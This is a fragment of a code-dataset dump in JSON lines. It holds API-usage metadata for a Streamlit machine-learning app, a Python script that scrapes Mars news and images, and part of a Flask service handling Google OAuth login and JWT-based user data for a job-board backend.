"usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.crosstab", "line_number": 89, "usage_type": "call"}, {"api_name": "streamlit.pyplot", "line_number": 91, "usage_type": "call"}, {"api_name": "plotly.express.box", "line_number": 95, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 95, "usage_type": "name"}, {"api_name": "plotly.express.box", "line_number": 97, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 97, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 100, "usage_type": "call"}, {"api_name": "plotly.express.histogram", "line_number": 103, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 103, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 106, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 110, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axvline", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 133, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 141, "usage_type": "call"}, {"api_name": "seaborn.distplot", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 146, "usage_type": "call"}, {"api_name": "streamlit.text", "line_number": 150, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 151, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 152, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 154, 
"usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 154, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Pie", "line_number": 155, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 155, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 158, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 167, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 180, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 181, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 182, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 186, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 191, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 194, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 195, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 204, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 204, "usage_type": "name"}, {"api_name": "streamlit.plotly_chart", "line_number": 208, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 213, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 217, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 222, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 222, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.file_uploader", "line_number": 228, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 228, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 232, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 232, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.slider", "line_number": 234, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 234, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 238, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 238, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 239, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 239, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 244, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 244, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 247, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 247, "usage_type": "attribute"}, {"api_name": "streamlit.write", "line_number": 248, "usage_type": "call"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 250, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 250, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 253, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 253, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 256, "usage_type": "call"}, {"api_name": "streamlit.sidebar", 
"line_number": 256, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 257, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 257, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.text_input", "line_number": 259, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 259, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.text_input", "line_number": 261, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 261, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 263, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 263, "usage_type": "attribute"}, {"api_name": "streamlit.write", "line_number": 266, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 274, "usage_type": "call"}, {"api_name": "streamlit.sidebar.info", "line_number": 277, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 277, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 281, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 281, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 285, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 285, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.number_input", "line_number": 288, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 288, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 289, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 289, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 293, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 293, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 297, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 297, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 300, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 300, "usage_type": "attribute"}, {"api_name": "streamlit.success", "line_number": 301, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 306, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 306, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.multiselect", "line_number": 327, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 327, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 339, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 339, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.write", "line_number": 342, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 342, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 343, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 343, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 348, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 350, "usage_type": "call"}, {"api_name": "streamlit.sidebar.write", "line_number": 353, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 353, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 356, "usage_type": "call"}, 
{"api_name": "streamlit.write", "line_number": 360, "usage_type": "call"}, {"api_name": "streamlit.sidebar.write", "line_number": 362, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 362, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.warning", "line_number": 364, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 364, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 368, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 368, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.slider", "line_number": 372, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 372, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 375, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 375, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 379, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 379, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 391, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 391, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 396, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 396, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 401, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 401, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 406, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 406, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 411, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 411, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 416, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 416, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 420, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 420, "usage_type": "attribute"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 421, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 424, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 426, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 428, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 434, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 438, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 442, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 444, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 452, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 453, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 458, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 458, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 459, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 464, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 464, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 469, "usage_type": "call"}, {"api_name": 
"streamlit.sidebar", "line_number": 469, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 474, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 474, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 479, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 479, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 484, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 484, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 489, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 489, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 494, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 494, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 498, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 498, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 499, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 502, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 504, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 506, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 512, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 516, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 521, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 523, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 531, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 532, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 537, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 537, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 538, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 542, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 542, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 547, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 547, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 552, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 552, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 557, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 557, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 561, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 561, "usage_type": "attribute"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 562, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 565, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 567, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 569, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 575, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 579, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 584, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 586, 
"usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 594, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 595, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 600, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 600, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 601, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 605, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 605, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 610, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 610, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 615, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 615, "usage_type": "attribute"}, {"api_name": "streamlit.error", "line_number": 621, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 624, "usage_type": "call"}, {"api_name": "streamlit.sidebar.button", "line_number": 628, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 628, "usage_type": "attribute"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 629, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 632, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 635, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 637, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 643, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 647, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 652, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 654, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 662, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 663, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 667, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 667, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 667, "usage_type": "call"}, {"api_name": "streamlit.warning", "line_number": 671, "usage_type": "call"}, {"api_name": "streamlit.sidebar.checkbox", "line_number": 675, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 675, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 680, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 680, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.selectbox", "line_number": 685, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 685, "usage_type": "attribute"}, {"api_name": "streamlit.sidebar.button", "line_number": 689, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 689, "usage_type": "attribute"}, {"api_name": "sklearn.svm.SVC", "line_number": 690, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 693, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 695, "usage_type": "call"}, {"api_name": "streamlit.error", "line_number": 697, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 703, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 707, "usage_type": "call"}, {"api_name": "streamlit.table", "line_number": 712, "usage_type": "call"}, {"api_name": 
"streamlit.markdown", "line_number": 714, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 722, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 723, "usage_type": "call"}, {"api_name": "streamlit.sidebar.markdown", "line_number": 725, "usage_type": "call"}, {"api_name": "streamlit.sidebar", "line_number": 725, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 726, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 732, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 736, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 737, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 755, "usage_type": "call"}, {"api_name": "streamlit.write", "line_number": 756, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 756, "usage_type": "call"}, {"api_name": "sklearn.model_selection.learning_curve", "line_number": 758, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 758, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 761, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 761, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 762, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 762, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 763, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 763, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 764, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 764, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 765, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 765, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 767, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 767, "usage_type": "name"}, {"api_name": "streamlit.pyplot", "line_number": 768, "usage_type": "call"}]}
+{"seq_id": "29057862793", "text": "from bs4 import BeautifulSoup as bs\nimport pandas as pd\nfrom splinter import Browser\nimport requests\n\n#define function to intiate \"light\" browser for nav\ndef init_browser():\n executable_path = {'executable_path':'chromedriver.exe'}\n browser = Browser('chrome',**executable_path, headless=False)\n\n return browser\n\n\n#define the scrape function\ndef scrape():\n\n #### Get news title and body ####\n\n # Get page HTML into a Soup\n browser = init_browser()\n url_to_scrape = \"https://redplanetscience.com/\"\n browser.visit(url_to_scrape)\n html = browser.html\n soup = bs(html,'html.parser')\n\n # Get all news items\n news_items = soup.find_all('div', class_='list_text')\n\n news_title = news_items[0].find('div', class_='content_title').text\n news_p = news_items[0].find('div', class_='article_teaser_body').text\n\n #### Get Featured Image ####\n\n # Get page HTML into a Soup\n url = \"https://spaceimages-mars.com/\"\n browser.visit(url)\n html = browser.html\n soup = bs(html,'html.parser')\n #assing source url to variable\n featured_image_url = soup.find_all('img', class_='headerimage fade-in')[0][\"src\"]\n\n #### Get Table ####\n\n # Get page HTML into a Soup\n url = \"https://galaxyfacts-mars.com/\"\n tables = pd.read_html(url)\n #scrape to pd.dataframe\n df2 = tables[1]\n #assign column headers\n df2.columns = [\"Mars\", \"Value\"]\n #convert to html\n mars_html_table = df2.to_html()\n\n #### Get Hemispheres ####\n\n # Get page HTML into a Soup\n url = 'https://marshemispheres.com/'\n browser.visit(url)\n html = browser.html\n soup = bs(html, 'html.parser')\n # Get all news items\n hemispheres = soup.find_all('div', class_='item')\n #create empty list to append dictionaries\n hemisphere_image_urls = []\n #loop through each iteration of hemispheres\n for hemisphere in hemispheres:\n\n hemisphere = hemisphere.find('div', class_=\"description\")\n #Get title\n title = hemisphere.h3.text\n #Assign sub-url for page nav\n link = hemisphere.a[\"href\"]\n #navigate\n browser.visit(url + link)\n # Get page HTML into a Soup\n html = browser.html\n soup = bs(html, 'html.parser')\n #Get image url\n image_link = soup.find('div', class_='downloads')\n image_url = image_link.find('li').a[\"href\"]\n #create dictionary to hold values\n image_dict = {}\n #add values\n image_dict['title'] = title\n image_dict['img_url'] = image_url\n #append to list\n hemisphere_image_urls.append(image_dict)\n #trim variable\n hemisphere_images = hemisphere_image_urls\n\n # Store data in dictionary\n mars_dict = {\n \"news_title\": news_title,\n \"news_p\": news_p,\n \"featured_image_url\": featured_image_url,\n \"table\": str(mars_html_table),\n \"hemisphere_images\": hemisphere_images\n }\n\n # Return results\n return mars_dict\n", "repo_name": "Squonk713/Web-Scraping-Challenge", "sub_path": "mars_scrape2.py", "file_name": "mars_scrape2.py", "file_ext": "py", "file_size_in_byte": 3019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "splinter.Browser", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 24, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.read_html", "line_number": 46, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 60, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "39135345334", "text": "from flask import url_for, request\nfrom flask_dance.contrib.google import google\nfrom flask_jwt_extended import JWTManager, create_access_token, get_jwt_identity\nfrom flask import session\nfrom os import getenv\nfrom extensions import db\nfrom models.user import User\nfrom models.candidate import Candidate\nfrom models.employer import Employer\nfrom models.job_post import JobPost\n\nclass AuthService:\n\t@staticmethod\n\tdef google_login():\n\t\t# Get `type` query param\n\t\tuser_type = request.args.get('type')\n\t\t# Save user type in session\n\t\tif user_type:\n\t\t\tsession['user_type'] = user_type\n\t\t# Return google login url\n\t\treturn url_for('google.login')\n\n\t@staticmethod\n\tdef google_login_callback():\n\t\ttry:\n\t\t\tif not google.authorized:\n\t\t\t\treturn url_for('google.login')\n\n\t\t\taccount_info = google.get('/oauth2/v2/userinfo')\n\t\t\tif account_info.ok:\n\t\t\t\taccount_info_json = account_info.json()\n\t\t\t\temail = account_info_json['email']\n\t\t\t\t# Check if user is in database\n\t\t\t\tuser = User.query.filter_by(email=email).first()\n\t\t\t\tif not user:\n\t\t\t\t\t# Create user \n\t\t\t\t\tname = account_info_json['name']\n\t\t\t\t\t# Split name into first and last name\n\t\t\t\t\tname_split = name.split(' ')\n\t\t\t\t\tfirst_name = name_split[0]\n\t\t\t\t\tlast_name = name_split[-1]\n\t\t\t\t\t# Get user type from session\n\t\t\t\t\tuser_type = session.get('user_type') or None\n\t\t\t\t\tif not user_type:\n\t\t\t\t\t\treturn {'error': 'User type not found'}\n\t\t\t\t\t\n\t\t\t\t\tif user_type == 'candidate':\n\t\t\t\t\t\tuser = Candidate(\n\t\t\t\t\t\t\temail=email,\n\t\t\t\t\t\t\tfirst_name=first_name,\n\t\t\t\t\t\t\tlast_name=last_name\n\t\t\t\t\t\t)\n\t\t\t\t\telif user_type == 'employer':\n\t\t\t\t\t\tuser = Employer(\n\t\t\t\t\t\t\temail=email,\n\t\t\t\t\t\t\tfirst_name=first_name,\n\t\t\t\t\t\t\tlast_name=last_name\n\t\t\t\t\t\t)\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn {'error': 'Invalid user type'}\n\t\t\t\t\t# Add user to database\n\t\t\t\t\tdb.session.add(user)\n\t\t\t\t\tdb.session.commit()\n\t\t\t\t# Create JWT token\n\t\t\t\taccess_token = create_access_token(identity=email)\n\t\t\t\t# Return url to frontend with JWT token\n\t\t\t\tredirect_url = request.args.get('redirect_url') or getenv('FRONTEND_URL')\n\t\t\t\treturn f'{redirect_url}?token={access_token}'\n\t\t\telse:\n\t\t\t\treturn {'error': 'Failed to fetch user info'}\n\t\texcept Exception as e:\n\t\t\treturn {'error': str(e)}\n\t\t\n\t@staticmethod\n\tdef user_data():\n\t\ttry:\n\t\t\tuser_email = get_jwt_identity()\n\t\t\tuser = User.query.filter_by(email=user_email).first()\n\t\t\tif user:\n\t\t\t\t# Get company_id from employer model if user is employer\n\t\t\t\tif user.type == 'employer':\n\t\t\t\t\temployer = Employer.query.filter_by(id=user.id).first()\n\t\t\t\t\tdata = employer.serialize()\n\t\t\t\t\tdata['id'] = user.id\n\t\t\t\t\tdata['type'] = user.type\n\t\t\t\t\t# Add job posts to data\n\t\t\t\t\tjob_posts = JobPost.query.filter_by(employer_id=user.id).all()\n\t\t\t\t\tdata['job_posts'] = [job_post.serialize() for job_post in job_posts]\n\t\t\t\t\treturn data\n\t\t\t\telif user.type == 'candidate':\n\t\t\t\t\tcandidate = Candidate.query.filter_by(id=user.id).first()\n\t\t\t\t\tdata = candidate.serialize()\n\t\t\t\t\tdata['id'] = user.id\n\t\t\t\t\tdata['type'] = user.type\n\t\t\t\t\treturn data\n\t\t\telse:\n\t\t\t\treturn {'error': 'User not found'}\n\t\texcept Exception as e:\n\t\t\tprint('Error', e)\n\t\t\treturn {'error': 
str(e)}\n\n\t\t", "repo_name": "WaleedAhmed05/GoldenBullets-Soen6011summer2023", "sub_path": "backend/app/services/auth.py", "file_name": "auth.py", "file_ext": "py", "file_size_in_byte": 3071, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.request.args.get", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google.authorized", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask_dance.contrib.google.google", "line_number": 26, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 27, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google.get", "line_number": 29, "usage_type": "call"}, {"api_name": "flask_dance.contrib.google.google", "line_number": 29, "usage_type": "name"}, {"api_name": "models.user.User.query.filter_by", "line_number": 34, "usage_type": "call"}, {"api_name": "models.user.User.query", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.user.User", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 43, "usage_type": "name"}, 